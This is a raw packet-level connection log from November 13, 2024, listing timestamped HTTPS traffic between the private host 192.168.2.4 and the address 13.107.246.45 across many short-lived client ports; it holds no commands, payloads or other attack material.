Nov 13, 2024 18:44:51.787797928 CET	49981	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.787797928 CET	49981	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.787798882 CET	49981	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.790582895 CET	49985	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.790676117 CET	443	49985	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.790791035 CET	49985	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.790950060 CET	49985	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.790971041 CET	443	49985	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.890178919 CET	443	49982	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.890367985 CET	443	49982	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.890436888 CET	49982	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.890497923 CET	49982	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.890508890 CET	443	49982	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.890541077 CET	49982	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.890549898 CET	443	49982	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.892715931 CET	49986	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.892746925 CET	443	49986	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.892823935 CET	49986	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.892937899 CET	49986	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.892947912 CET	443	49986	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.997092009 CET	443	49983	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.997416019 CET	49983	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.997433901 CET	443	49983	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.997917891 CET	49983	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.997922897 CET	443	49983	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.091551065 CET	49981	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.091573954 CET	443	49981	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.126348972 CET	443	49983	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.126800060 CET	443	49983	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.126969099 CET	49983	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.126969099 CET	49983	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.126969099 CET	49983	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.129230022 CET	49987	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.129280090 CET	443	49987	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.129359961 CET	49987	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.129477024 CET	49987	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.129487038 CET	443	49987	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.397394896 CET	443	49984	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.397855997 CET	49984	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.397875071 CET	443	49984	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.398267031 CET	49984	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.398269892 CET	443	49984	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.435286999 CET	49983	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.435307026 CET	443	49983	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.528280020 CET	443	49984	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.528460979 CET	443	49984	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.528733969 CET	443	49985	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.528820992 CET	49984	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.529290915 CET	49984	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.529290915 CET	49984	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.529314041 CET	443	49984	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.529325008 CET	443	49984	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.529441118 CET	49985	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.529485941 CET	443	49985	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.529817104 CET	49985	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.529824972 CET	443	49985	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.531939030 CET	49988	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.532031059 CET	443	49988	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.532130003 CET	49988	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.532267094 CET	49988	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.532290936 CET	443	49988	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.638988972 CET	443	49986	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.639296055 CET	49986	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.639322042 CET	443	49986	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.639729023 CET	49986	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.639750004 CET	443	49986	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.663242102 CET	443	49985	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.663429976 CET	443	49985	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.663635015 CET	49985	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.663635015 CET	49985	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.663635015 CET	49985	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.665725946 CET	49989	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.665847063 CET	443	49989	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.665998936 CET	49989	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.666132927 CET	49989	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.666171074 CET	443	49989	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.770347118 CET	443	49986	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.770405054 CET	443	49986	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.770531893 CET	49986	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.770546913 CET	443	49986	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.770699978 CET	49986	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.770723104 CET	443	49986	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.770746946 CET	443	49986	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.770795107 CET	49986	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.770827055 CET	49986	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.770838022 CET	443	49986	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.770847082 CET	49986	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.770850897 CET	443	49986	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.773401022 CET	49990	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.773492098 CET	443	49990	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.773653030 CET	49990	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.773811102 CET	49990	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.773844004 CET	443	49990	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:52.966655016 CET	49985	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:52.966691971 CET	443	49985	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.071943998 CET	443	49987	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.072557926 CET	49987	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.072591066 CET	443	49987	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.072817087 CET	49987	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.072825909 CET	443	49987	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.206444025 CET	443	49987	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.206511021 CET	443	49987	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.206598043 CET	49987	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.206634998 CET	443	49987	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.206660032 CET	443	49987	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.206708908 CET	49987	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.206758022 CET	49987	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.206784964 CET	443	49987	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.206796885 CET	49987	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.206804037 CET	443	49987	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.209233999 CET	49991	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.209321976 CET	443	49991	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.209563971 CET	49991	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.209564924 CET	49991	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.209700108 CET	443	49991	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.408802032 CET	443	49989	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.409398079 CET	49989	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.409490108 CET	443	49989	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.409796953 CET	49989	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.409854889 CET	443	49989	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.500603914 CET	443	49988	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.501142979 CET	49988	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.501205921 CET	443	49988	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.501518011 CET	49988	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.501574993 CET	443	49988	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.539407015 CET	443	49989	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.539459944 CET	443	49989	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.539582014 CET	443	49989	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.539839029 CET	49989	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.539839029 CET	49989	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.539839029 CET	49989	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.539839029 CET	49989	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.542346001 CET	49992	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.542392015 CET	443	49992	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.542578936 CET	49992	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.542638063 CET	49992	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.542651892 CET	443	49992	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.746351957 CET	443	49988	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.746416092 CET	443	49988	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.746462107 CET	443	49988	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.746598959 CET	49988	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.746599913 CET	49988	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.746666908 CET	443	49988	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.746754885 CET	49988	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.759124994 CET	443	49988	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.759331942 CET	49988	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.759339094 CET	443	49988	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.759331942 CET	49988	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.759331942 CET	49988	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.759437084 CET	443	49988	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.759480953 CET	49988	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.759499073 CET	443	49988	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.761419058 CET	49993	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.761460066 CET	443	49993	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.761526108 CET	49993	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.761619091 CET	49993	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.761627913 CET	443	49993	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.799949884 CET	443	49990	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.800508976 CET	49990	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.800575018 CET	443	49990	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.800637960 CET	49990	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.800652027 CET	443	49990	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.841682911 CET	49989	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.841747046 CET	443	49989	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.950339079 CET	443	49991	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.951005936 CET	49991	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.951066971 CET	443	49991	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:53.951335907 CET	49991	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:53.951392889 CET	443	49991	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.041207075 CET	443	49990	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.041280985 CET	443	49990	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.041323900 CET	443	49990	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.041378021 CET	49990	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.041452885 CET	443	49990	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.041497946 CET	49990	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.041521072 CET	49990	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.049595118 CET	443	49990	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.049639940 CET	443	49990	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.049685955 CET	49990	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.049700975 CET	443	49990	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.049756050 CET	49990	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.049756050 CET	49990	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.049781084 CET	443	49990	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.049849987 CET	49990	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.049849987 CET	49990	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.049890041 CET	49990	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.049916983 CET	443	49990	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.052311897 CET	49994	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.052398920 CET	443	49994	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.052553892 CET	49994	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.052679062 CET	49994	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.052706003 CET	443	49994	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.087471962 CET	443	49991	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.087552071 CET	443	49991	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.087807894 CET	49991	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.087869883 CET	443	49991	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.088176966 CET	49991	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.088176966 CET	49991	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.088176966 CET	49991	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.088248968 CET	443	49991	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.088507891 CET	443	49991	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.088641882 CET	443	49991	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.088701963 CET	49991	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.089798927 CET	49995	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.089845896 CET	443	49995	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.090023041 CET	49995	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.090023041 CET	49995	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.090075970 CET	443	49995	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.280540943 CET	443	49992	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.281075954 CET	49992	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.281167030 CET	443	49992	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.281467915 CET	49992	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.281483889 CET	443	49992	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.410901070 CET	443	49992	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.410955906 CET	443	49992	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.411079884 CET	443	49992	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.411123037 CET	49992	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.411202908 CET	49992	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.411202908 CET	49992	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.411246061 CET	49992	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.411283016 CET	443	49992	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.413696051 CET	49996	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.413816929 CET	443	49996	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.413912058 CET	49996	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.414216995 CET	49996	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.414304018 CET	443	49996	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.513298035 CET	443	49993	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.514060020 CET	49993	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.514095068 CET	443	49993	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.514349937 CET	49993	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.514386892 CET	443	49993	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.643925905 CET	443	49993	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.644088984 CET	443	49993	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.644243956 CET	49993	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.644243956 CET	49993	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.644243956 CET	49993	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.646539927 CET	49997	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.646629095 CET	443	49997	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.646724939 CET	49997	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.646850109 CET	49997	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.646900892 CET	443	49997	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.791763067 CET	443	49994	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.792238951 CET	49994	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.792303085 CET	443	49994	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.792603970 CET	49994	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.792659998 CET	443	49994	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.871731997 CET	443	49995	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.872077942 CET	49995	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.872100115 CET	443	49995	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.872431993 CET	49995	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.872442007 CET	443	49995	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.872786045 CET	49993	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.872808933 CET	443	49993	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.921828032 CET	443	49994	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.922025919 CET	443	49994	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.922195911 CET	49994	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.923669100 CET	49994	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.923670053 CET	49994	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.923737049 CET	443	49994	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.923774958 CET	443	49994	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.925705910 CET	49998	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.925766945 CET	443	49998	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:54.925832987 CET	49998	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.925925970 CET	49998	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:54.925955057 CET	443	49998	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.003048897 CET	443	49995	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.003298998 CET	443	49995	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.003459930 CET	49995	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.003520012 CET	49995	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.003541946 CET	443	49995	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.003566980 CET	49995	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.003575087 CET	443	49995	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.005244017 CET	49999	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.005337954 CET	443	49999	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.005420923 CET	49999	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.005523920 CET	49999	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.005548954 CET	443	49999	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.146094084 CET	443	49996	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.146640062 CET	49996	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.146704912 CET	443	49996	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.146910906 CET	49996	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.146925926 CET	443	49996	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.171128035 CET	443	49977	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.173656940 CET	49977	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.173722029 CET	443	49977	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.173918962 CET	49977	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.173934937 CET	443	49977	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.274724007 CET	443	49996	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.275011063 CET	443	49996	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.275311947 CET	49996	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.275312901 CET	49996	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.275312901 CET	49996	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.277303934 CET	50000	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.277354956 CET	443	50000	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.277415037 CET	50000	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.277514935 CET	50000	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.277523994 CET	443	50000	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.393110037 CET	443	49997	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.393532991 CET	49997	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.393610954 CET	443	49997	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.393821001 CET	49997	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.393836021 CET	443	49997	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.401729107 CET	443	49977	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.401802063 CET	443	49977	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.401865005 CET	49977	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.401918888 CET	49977	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.401938915 CET	443	49977	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.401983976 CET	49977	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.401992083 CET	443	49977	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.403480053 CET	50001	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.403573036 CET	443	50001	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.403873920 CET	50001	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.403873920 CET	50001	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.404005051 CET	443	50001	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.525937080 CET	443	49997	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.526016951 CET	443	49997	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.526073933 CET	49997	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.526118040 CET	443	49997	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.526159048 CET	443	49997	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.526205063 CET	49997	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.541805983 CET	49997	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.541806936 CET	49997	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.541865110 CET	443	49997	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.541897058 CET	443	49997	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.591566086 CET	49996	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.591609955 CET	443	49996	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.688046932 CET	443	49998	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.689203024 CET	49998	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.689268112 CET	443	49998	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.689603090 CET	49998	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.689619064 CET	443	49998	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.760534048 CET	443	49999	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.760888100 CET	49999	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.760953903 CET	443	49999	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.761255026 CET	49999	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.761270046 CET	443	49999	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.821584940 CET	443	49998	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.821741104 CET	443	49998	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.821830988 CET	49998	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.821991920 CET	49998	443	192.168.2.4	13.107.246.45
